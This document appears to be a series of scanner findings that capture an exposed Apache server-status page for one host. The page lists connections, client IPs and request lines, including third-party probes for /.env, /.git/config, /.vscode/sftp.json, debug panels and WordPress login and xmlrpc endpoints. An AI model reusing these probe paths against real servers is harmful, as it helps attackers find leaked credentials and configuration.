0/1/1/0/0 (open/recv/resp/push/rst)
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802962033f4
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Monday, 06-Feb-2023 22:30:43 CET Restart Time: Saturday, 07-Jan-2023 18:56:40 CET Parent Server Config. Generation: 18 Parent Server MPM Generation: 17 Server uptime: 30 days 3 hours 34 minutes 3 seconds Server load: 0.00 0.00 0.00 Total accesses: 1532412 - Total Traffic: 26.9 GB - Total Duration: 251668869 CPU Usage: u304.53 s297.39 cu4675.24 cs3283.78 - .329% CPU load .588 requests/sec - 10.8 kB/second - 18.4 kB/request - 164.231 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01657404no0yes010000 11657401no0yes19000 21657403no0yes010000 31657402no0yes010000 41657533no0yes010000 Sum500 149000 ____________W_____________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1716574040/727/27270_ 76.092040243700.011.28484.48 139.144.253.153h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-1716574040/626/27917_ 76.0969020727493650.016.49459.23 80.27.52.114h2tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-1716574040/781/26638_ 76.660046578430.014.64485.93 139.144.253.153http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 0-1716574040/795/26824_ 76.660030526200.019.31510.33 139.144.253.153http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-1716574040/662/26130_ 76.6601104138170.032.70500.40 139.144.253.153http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 0-1716574040/703/26834_ 76.300173130836620.024.86476.84 139.144.253.153http/1.1 0-1716574040/779/27685_ 75.956932129462250.019.59514.05 8.210.102.36http/1.1relehse.com:443GET /wp-login.php HTTP/1.1 0-1716574040/663/27506_ 75.56690131861660.016.33459.38 107.170.225.15h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-1716574040/853/26620_ 76.660029341390.023.00505.73 139.144.253.153http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 0-1716574040/598/25730_ 75.82690651535130.014.37447.38 66.249.66.80http/1.1tandemsl.com:443done, streams: 0/47/47/0/0 (open/recv/resp/push/rst) 1-1716574010/351/19110_ 69.6300122345540.04.01344.01 139.144.253.153http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 1-1716574010/438/19703_ 68.64120268040980.011.24333.08 139.144.253.153h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-1716574010/412/19194W 68.160053577970.015.45383.91 139.144.253.153http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-1716574010/381/19750_ 68.57119855021440.07.16346.54 139.144.253.153http/1.1 1-1716574010/495/19893_ 69.630020543010.06.79340.75 139.144.253.153http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-1716574010/345/19275_ 69.630133626670.016.14334.53 139.144.253.153http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-1716574010/431/19566_ 69.630033641520.08.76317.67 139.144.253.153http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 1-1716574010/401/20266_ 69.4064296329865820.011.43327.39 66.249.66.141http/1.1tandemsl.com:443GET / HTTP/1.1 1-1716574010/342/19597_ 68.70640021750330.06.15347.71 66.249.66.141http/1.1 1-1716574010/430/20839_ 68.161153045169660.03.94372.92 38.41.29.83h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-1716574030/2055/25982_ 107.540046153180.056.53450.37 139.144.253.153http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-1716574030/2631/26717_ 107.540046754370.066.48517.69 139.144.253.153http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-1716574030/2609/26409_ 107.48021242798530.050.73469.86 139.144.253.153h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-1716574030/2074/26237_ 107.540130672640.061.79479.01 139.144.253.153http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 2-1716574030/2136/25862_ 107.532123935573970.051.47483.45 98.210.120.8http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 2-1716574030/2218/25267_ 107.5068126040669230.036.06429.53 114.119.143.177http/1.1tandemsl.com:443GET /medioambiente-blog/como-calcular-la-huella-de-carbono/ HTT 2-1716574030/2506/25954_ 107.4021127396590.040.28421.94 66.249.66.80http/1.1tandemsl.com:443GET /wp-content/uploads/2019/10/Reglamento-APQ-MIE-APQ-0.pdf HT 2-1716574030/2115/25157_ 107.438259347762350.048.51481.76 66.249.66.158http/1.1tandemsl.com:443GET /wp-content/uploads/2019/09/Compresed-v1.mp4 HTTP/1.1 2-1716574030/2343/25977_ 107.376751133217940.060.08476.05 85.51.21.227h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1716574030/2124/24494_ 107.5128042040590.046.70431.09 52.167.144.39h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1716574020/360/29265_ 66.09279042215930.07.80523.12 85.51.21.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-1716574020/334/28734_ 66.12448034851030.09.17563.76 154.160.3.178h2tandemsl.com:443idle, streams: 0/51/51/0/0 (open/recv/resp/push/rst) 3-1716574020/370/30310_ 66.930034662560.04.19521.33 139.144.253.153http/1.1 3-1716574020/486/28412_ 66.092035878860.021.59525.97 139.144.253.153h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-1716574020/289/29403_ 66.09822135706500.011.47504.11 107.170.225.15h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-1716574020/534/29620_ 66.9932559536440130.013.13527.42 66.249.66.200http/1.1tandemsl.com:443GET /wp-content/uploads/2019/09/Compresed-v1.mp4 HTTP/1.1 3-1716574020/323/28729_ 66.82117735269960.06.38506.63 139.144.253.153http/1.1 3-1716574020/331/29101_ 66.1232323578821300.09.52516.16 66.249.66.200http/1.1 3-1716574020/316/28850_ 67.108218552816180.04.54522.57 98.210.120.8http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 3-1716574020/291/29832_ 66.120151371980.05.79527.59 139.144.253.153h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-1716575330/2569/50815_ 117.71220169835030.075.11941.60 98.210.120.8http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 4-1716575330/2728/49767_ 117.68423856681540.077.67943.05 98.210.120.8http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1716575330/2806/52182_ 117.624068275480.063.81945.75 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1675718655.55127692222595214843 4-1716575330/2467/50853_ 117.7521068282030.066.93900.95 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1675719021.91913390159606933593 4-1716575330/2938/52208_ 117.5121075880510.074.63930.28 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1675718411.57828903198242187500 4-1716575330/2961/51001_ 117.4682062268800.063.09970.55 162.243.149.4http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/r
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802713d2dda
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Friday, 03-Feb-2023 20:36:57 CET Restart Time: Saturday, 07-Jan-2023 18:56:40 CET Parent Server Config. Generation: 17 Parent Server MPM Generation: 16 Server uptime: 27 days 1 hour 40 minutes 17 seconds Server load: 0.02 0.13 0.15 Total accesses: 1446706 - Total Traffic: 24.8 GB - Total Duration: 224182868 CPU Usage: u312.29 s296.32 cu4289.08 cs2940.97 - .335% CPU load .619 requests/sec - 11.1 kB/second - 17.9 kB/request - 154.961 ms/request 11 requests currently being processed, 39 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01537194no0yes28000 11389927no0yes010000 21389929no0yes28000 31389928no0yes73000 41390031no0yes010000 Sum500 1139000 _W______R___________R_____R___R___RRRWRR__________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1615371940/515/25777_ 19.63057137713250.011.63444.99 139.59.138.104http/1.1 0-1615371940/439/26628W 19.580024475580.05.00427.62 139.59.138.104http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-1615371940/417/25122_ 19.7031044162890.010.97446.26 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1675452986.00814890861511230468 0-1615371940/502/25197_ 19.653161327614340.05.63465.79 72.14.201.209h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1615371940/389/24568_ 19.7201101343440.08.30442.58 139.59.138.104http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 0-1615371940/363/25332_ 19.6126129003100.04.90421.08 103.23.61.80http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1615371940/391/26020_ 19.702618426936000.08.57471.16 69.195.110.65http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 0-1615371940/342/26019_ 19.590029363430.04.95425.82 139.59.138.104h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-1615371940/367/25031R 19.5847026906980.09.60454.41 139.59.138.104http/1.1 0-1615371940/389/24424_ 19.68024248699130.09.45413.64 197.27.13.232http/1.1tandemsl.com:443POST /wp-login.php HTTP/1.1 1-1613899270/508/18675_ 86.8514820121714480.08.81338.20 81.19.135.24http/1.1tandemsl.com:80GET /admin/controller/extension/extension/cgialfa HTTP/1.1 1-1613899270/458/19163_ 86.801482067478180.05.27320.76 81.19.135.24http/1.1 1-1613899270/691/18713_ 86.8737322352957660.06.35367.95 190.237.204.105http/1.1 1-1613899270/658/19297_ 86.8739927122186200.07.34336.33 190.237.204.105h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-1613899270/474/19317_ 87.150119969890.09.12332.86 139.59.138.104http/1.1 1-1613899270/583/18845_ 86.87148219232902410.010.46317.52 81.19.135.24http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-1613899270/468/19072_ 86.90148217232828190.07.68308.23 54.36.163.203http/1.1tandemsl.com:443GET /wp-reset.php HTTP/1.1 1-1613899270/491/19774_ 86.8737820829268750.07.86314.95 190.237.204.105http/1.1 1-1613899270/520/19195_ 86.87148922721097380.08.71341.04 186.30.144.86h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-1613899270/505/20287_ 86.87149019744213840.08.18366.76 81.19.135.24http/1.1tandemsl.com:443GET /templates/beez3/index.php HTTP/1.1 2-1613899290/1380/23656R 103.72256142710900.023.21385.51 103.23.61.80http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1613899290/1281/23845_ 103.71131043655750.018.80445.16 181.117.29.59h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-1613899290/1306/23586_ 103.7325325839132580.030.87412.87 66.249.69.113http/1.1tandemsl.com:443GET /feed/ HTTP/1.1 2-1613899290/1376/23947_ 102.9713135927070080.022.52410.05 181.117.29.59h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-1613899290/1202/23497_ 102.96025532588980.018.69422.37 139.59.138.104h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-1613899290/1179/22843_ 103.77253026173400.011.62383.66 159.65.111.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.0 2-1613899291/1380/23218C 103.890024684025.521.56378.80 139.59.138.104http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 2-1613899290/1145/22872_ 102.9616817044757530.024.19428.05 81.19.135.24http/1.1tandemsl.com:443GET /x.php HTTP/1.1 2-1613899290/1209/23380_ 103.02256029931810.017.84410.28 198.235.24.48http/1.1 2-1613899290/1289/22148_ 103.81168039014230.025.60375.72 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1675452849.34259891510009765625 3-1613899280/700/28813R 88.97128041598300.015.87511.39 181.117.29.59h2tandemsl.com:443idle, streams: 0/31/31/0/0 (open/recv/resp/push/rst) 3-1613899280/396/28305_ 89.020134012790.09.30553.67 139.59.138.104http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-1613899280/610/29848_ 88.95125033909560.011.65516.23 181.117.29.59h2tandemsl.com:443idle, streams: 0/13/13/0/0 (open/recv/resp/push/rst) 3-1613899280/426/27809_ 88.95125235173030.011.06503.33 181.117.29.59h2tandemsl.com:443done, streams: 0/32/32/0/0 (open/recv/resp/push/rst) 3-1613899280/589/29000R 88.97128049128580.06.34491.82 181.117.29.59h2tandemsl.com:443idle, streams: 0/30/30/0/0 (open/recv/resp/push/rst) 3-1613899280/483/28978R 88.96130035619300.07.04513.45 139.59.138.104http/1.1 3-1613899280/488/28292R 88.96130034311140.07.33499.21 181.117.29.59h2tandemsl.com:443idle, streams: 0/22/22/0/0 (open/recv/resp/push/rst) 3-1613899280/444/28674_ 89.020077796380.013.43504.82 139.59.138.104http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 3-1613899280/739/28420R 88.9712918851940630.010.68517.14 181.117.29.59h2tandemsl.com:443idle, streams: 0/25/25/0/0 (open/recv/resp/push/rst) 3-1613899280/499/29451R 88.97128050790540.014.19518.00 181.117.29.59h2tandemsl.com:443idle, streams: 0/32/32/0/0 (open/recv/resp/push/rst) 4-1613900310/4031/47415_ 162.296021055659580.077.25833.84 51.161.9.26http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 4-1613900310/3432/46140_ 162.253120352097240.061.97834.89 66.249.69.115http/1.1tandemsl.com:443GET /seguridad-de-producto-blog/denominacion-quimica-alternativ 4-1613900310/3779/48564_ 161.99012650546850.057.62837.13 139.59.138.104h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-1613900310/3413/47642_ 162.303122861725520.072.59812.68 197.27.13.232http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 4-1613900310/4089/48420_ 162.005967170560610.057.49827.26 181.117.29.59h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-1613900310/3487/47215_ 162.120057218350.067.50889.51 139.59.138.104http/1.1 4-1613900310/3931/49062_ 162.270253592060.068.88838.39 139.59.138.104h2done, streams: 0/0/0/0/0 (open/recv/resp/push/r
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858024d8bf193
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Sunday, 18-Dec-2022 20:31:00 CET Restart Time: Tuesday, 13-Dec-2022 10:08:15 CET Parent Server Config. Generation: 3 Parent Server MPM Generation: 2 Server uptime: 5 days 10 hours 22 minutes 45 seconds Server load: 0.00 0.00 0.00 Total accesses: 82741 - Total Traffic: 2.0 GB - Total Duration: 2908212 CPU Usage: u51.61 s75.26 cu333.84 cs405.6 - .185% CPU load .176 requests/sec - 4641 B/second - 25.7 kB/request - 35.1484 ms/request 9 requests currently being processed, 41 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02665383no0yes010000 12665384no0yes19000 22665385no0yes010000 32665386no0yes010000 42665515no0yes82000 Sum500 941000 ____________R___________________________RWWRRR_R_R Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-226653830/70/2353_ 19.1619200925570.00.5557.24 95.59.26.9http/1.1 0-226653830/70/2371_ 19.302279371199880.00.4857.58 51.178.207.154http/1.1relehse.com:443HEAD /login?solarwinds HTTP/1.1 0-226653830/63/2367_ 19.6587331465970.00.7448.33 161.35.224.81http/1.1 0-226653830/79/2345_ 18.900431232690.00.7255.05 139.144.69.48http/1.1 0-226653830/65/2364_ 20.40880590500.01.0459.03 161.35.224.81http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST / HTTP/1.1 0-226653830/66/2355_ 19.851919155564610.00.3949.75 95.59.26.9http/1.1tandemsl.com:443POST /wp-login.php HTTP/1.1 0-226653830/77/2370_ 19.8519201564590.00.5950.58 95.59.26.9http/1.1tandemsl.com:443GET /wp-json/wp/v2/users HTTP/1.1 0-226653830/71/2358_ 19.70031638200.00.7955.22 139.144.69.48http/1.1 0-226653830/72/2339_ 19.1719191543060.00.4646.84 95.59.26.9http/1.1 0-226653830/73/2386_ 18.382279264594590.00.5368.85 51.178.207.154http/1.1 1-226653840/29/1175_ 15.3216507111238970.00.2029.69 185.233.36.233http/1.1tandemsl.com:443POST /wp-login.php HTTP/1.1 1-226653840/26/1179_ 5.571650814160430.00.1630.31 185.233.36.233http/1.1 1-226653840/31/1181R 9.483196920116710.00.2230.25 139.144.69.48http/1.1 1-226653840/30/1198_ 6.2200179680.00.1731.18 139.144.69.48http/1.1 1-226653840/28/1198_ 9.5000253290.00.1827.90 139.144.69.48http/1.1 1-226653840/30/1210_ 9.48285261172640.00.2628.12 82.80.230.228http/1.1 1-226653840/30/1181_ 15.3116508187151320.00.1926.95 185.233.36.233http/1.1tandemsl.com:443GET /wp-login.php HTTP/1.1 1-226653840/29/1183_ 9.48270040154400.00.2746.14 139.177.178.188http/1.1 1-226653840/28/1170_ 9.50165070611140.00.1928.03 185.233.36.233http/1.1 1-226653840/29/1222_ 7.47155310168810.00.1830.03 162.142.125.8http/1.1 2-226653850/17/1257_ 12.554598201170120.00.1234.26 4.205.20.118http/1.1 2-226653850/17/1237_ 9.83337521171600.00.2927.11 91.134.248.249http/1.1 2-226653850/16/1247_ 9.8434770229750.00.1033.09 13.235.237.75http/1.1 2-226653850/19/1229_ 18.2612835172456320.00.1130.45 171.244.0.91http/1.1tandemsl.com:443POST /wp-login.php HTTP/1.1 2-226653850/14/1240_ 9.8465390774870.00.0427.85 93.176.131.51http/1.1relehse.com:443GET /admin_layout/plugins/flot/jquery.flot.resize.min.js HTTP/1 2-226653850/17/1246_ 19.5133760293290.00.0828.92 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1671388484.59053802490234375000 2-226653850/18/1254_ 9.8433760196830.00.2832.67 139.177.178.188http/1.1 2-226653850/18/1229_ 19.473477202419460.00.1026.44 13.235.237.75http/1.1tandemsl.com:443GET /wp-login.php HTTP/1.1 2-226653850/15/1239_ 20.241283210351490.00.0730.37 80.247.230.51http/1.1tandemsl.com:443POST /wp-login.php HTTP/1.1 2-226653850/18/1234_ 19.51337592880570.00.1730.90 91.134.248.249http/1.1tandemsl.com:443POST /wp-login.php HTTP/1.1 3-226653860/3/1044_ 9.64302500514980.00.0525.30 93.176.131.51http/1.1relehse.com:443GET /admin_layout/assets/js/libs/lodash.compat.min.js HTTP/1.1 3-226653860/4/1053_ 9.6410132020.00.0425.81 139.144.69.48http/1.1 3-226653860/4/1046_ 9.64302500380430.00.0126.67 93.176.131.51http/1.1relehse.com:443GET /admin_layout/plugins/outlook/config.js HTTP/1.1 3-226653860/4/1035_ 9.6400239060.00.0123.14 139.144.69.48http/1.1 3-226653860/4/1046_ 18.97316701016920.00.0227.08 43.204.236.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 3-226653860/6/1046_ 9.6431670210100.00.0526.50 43.204.236.3http/1.1 3-226653860/5/1057_ 19.9600235900.00.0321.32 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-226653860/5/1051_ 19.9601149670.00.0327.43 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-226653860/5/1019_ 9.64285371492410.00.3224.74 82.80.230.228http/1.1 3-226653860/5/1036_ 9.64302530589230.00.1227.78 93.176.131.51http/1.1relehse.com:443GET /admin_layout/assets/css/font/fontawesome-webfont.woff?v=3. 4-226655150/78/2437R 21.2912872440.00.6061.39 139.144.69.48http/1.1 4-226655150/71/2433W 20.4100830540.00.4462.61 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 4-226655150/74/2425W 20.97001030760.00.9967.30 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-226655150/78/2387R 21.268801249440.00.5158.02 139.144.69.48http/1.1 4-226655150/77/2448R 20.92111548450.00.4970.94 139.144.69.48http/1.1 4-226655150/71/2471R 20.6710867870.00.4590.75 139.144.69.48http/1.1 4-226655150/73/2443_ 21.14036891410.00.4562.87 139.144.69.48http/1.1 4-226655150/77/2460R 20.674792861746320.00.5152.25 139.144.69.48http/1.1 4-226655150/84/2442_ 20.67061220700.00.6872.53 139.144.69.48http/1.1 4-226655150/74/2445R 20.49880791920.00.4563.93 139.144.69.48http/1.1 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request DurSum of milliseconds required to process all requests ConnKil
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802acdd30f2
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Wednesday, 07-Dec-2022 16:32:28 CET Restart Time: Friday, 25-Nov-2022 14:38:37 CET Parent Server Config. Generation: 9 Parent Server MPM Generation: 8 Server uptime: 12 days 1 hour 53 minutes 51 seconds Server load: 0.00 0.00 0.00 Total accesses: 232196 - Total Traffic: 5.8 GB - Total Duration: 5397889 CPU Usage: u128.59 s163.99 cu758.71 cs930.34 - .19% CPU load .222 requests/sec - 5.8 kB/second - 26.3 kB/request - 23.2471 ms/request 10 requests currently being processed, 40 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02441677no0yes73000 12441680no0yes28000 22441678no0yes010000 32441679no0yes19000 42441809no0yes010000 Sum500 1040000 _W_RRRRR_W___R___R___________________R____________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-824416770/597/3243_ 45.68024408850.014.6182.27 164.92.143.142http/1.1 0-824416770/588/3250W 45.7700881410.014.7281.64 164.92.143.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-824416770/593/3238_ 46.0925850280410.013.3189.96 167.248.133.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-824416770/593/3254R 45.51319819357140.014.8087.55 213.192.214.80http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 0-824416770/589/3276R 46.0626760368780.014.4580.85 185.74.5.84http/1.1tandemsl.com:443POST / HTTP/1.1 0-824416770/618/3258R 45.8025860424690.014.4479.98 167.248.133.47http/1.1 0-824416770/581/3269R 45.90310329595490.012.8484.68 164.92.143.142http/1.1 0-824416770/595/3255R 46.0925860341370.012.0880.44 167.248.133.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-824416770/596/3257_ 45.85258541407280.013.7783.11 167.248.133.47http/1.1 0-824416770/590/3266W 45.3500368160.018.1687.50 164.92.143.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-824416800/526/6359_ 40.792584771762030.013.76169.97 167.248.133.47http/1.1 1-824416800/531/6356_ 40.790481567020.011.67168.69 164.92.143.142http/1.1 1-824416800/534/6351_ 40.890262227630.012.21164.56 164.92.143.142http/1.1 1-824416800/535/6335R 40.813513181504710.012.40179.54 213.192.214.80http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 1-824416800/527/6370_ 40.862586201706490.012.96187.66 167.248.133.47http/1.1 1-824416800/540/6300_ 40.73348501909400.014.65182.36 213.192.214.80http/1.1relehse.com:443GET /admin_layout/plugins/jtree-drag-drop/css/32px.png HTTP/1.1 1-824416800/537/6316_ 40.72002288020.013.05195.92 164.92.143.142http/1.1 1-824416800/527/6327R 41.033516261672920.014.91164.68 213.192.214.80http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 1-824416800/533/6358_ 41.45258601748310.012.92185.14 167.248.133.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-824416800/536/6318_ 40.72002243370.012.53160.83 164.92.143.142http/1.1 2-824416780/969/3617_ 48.2902421950.020.1388.92 164.92.143.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 2-824416780/972/3608_ 46.7529428404150.023.2794.09 167.248.133.47http/1.1 2-824416780/985/3588_ 48.0401963150.023.9295.08 183.136.225.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-824416780/956/3612_ 47.192940863600.022.5389.64 51.178.207.154http/1.1 2-824416780/938/3581_ 47.153460325030.020.1895.83 185.74.5.84http/1.1tandemsl.com:80GET /.env HTTP/1.1 2-824416780/966/3609_ 48.2902458960.025.0098.81 164.92.143.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 2-824416780/968/3620_ 48.133501366500.025.7389.52 183.136.225.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-824416780/956/3625_ 48.15294351420390.022.0788.88 51.178.207.154http/1.1relehse.com:443HEAD /login?solarwinds HTTP/1.1 2-824416780/956/3568_ 48.133460384190.024.3490.53 183.136.225.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /robots.txt HTTP/1.1 2-824416780/982/3635_ 46.7735020536460.019.6085.45 213.192.214.80http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 3-824416790/506/3645_ 40.6008490130.013.5994.11 164.92.143.142http/1.1 3-824416790/500/3647_ 40.5943270652680.012.4987.43 213.192.214.80http/1.1relehse.com:443GET /admin_layout/plugins/datatables/dataTables.bootstrap.min.j 3-824416790/498/3646_ 40.5943300578490.011.8392.53 213.192.214.80http/1.1relehse.com:443GET /admin_layout/plugins/noty/themes/default.js HTTP/1.1 3-824416790/506/3656_ 40.59018580670.014.0091.96 164.92.143.142http/1.1 3-824416790/503/3580_ 41.3125840978820.010.8988.85 167.248.133.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-824416790/496/3641_ 40.5943270523770.012.8190.70 213.192.214.80http/1.1relehse.com:443GET /admin_layout/assets/js/plugins.js HTTP/1.1 3-824416790/497/3636_ 40.5925840485690.014.6593.34 167.248.133.47http/1.1 3-824416790/483/3629R 40.5943310834000.015.60101.65 213.192.214.80http/1.1relehse.com:443GET /admin_layout/plugins/daterangepicker/daterangepicker.js HT 3-824416790/504/3664_ 40.6043300485150.014.1487.14 213.192.214.80http/1.1relehse.com:443GET /admin_layout/plugins/jtree-drag-drop/css/folder-3.png HTTP 3-824416790/497/3609_ 40.5940100510050.014.0091.16 213.192.214.80http/1.1 4-824418090/1038/6420_ 48.1077201516960.025.78142.02 185.74.5.84http/1.1tandemsl.com:80POST / HTTP/1.1 4-824418090/1021/6407_ 48.887722041714560.024.90161.24 47.114.72.18http/1.1tandemsl.com:443POST /wp-login.php HTTP/1.1 4-824418090/1030/6398_ 47.630281376270.029.35156.05 164.92.143.142http/1.1 4-824418090/1021/6319_ 47.7577202423120.025.31155.03 120.78.131.106http/1.1 4-824418090/1011/6349_ 48.710341828590.024.00142.13 164.92.143.142http/1.1 4-824418090/1016/6384_ 48.8877212036440.022.04146.81 103.23.61.80http/1.1tandemsl.com:443POST 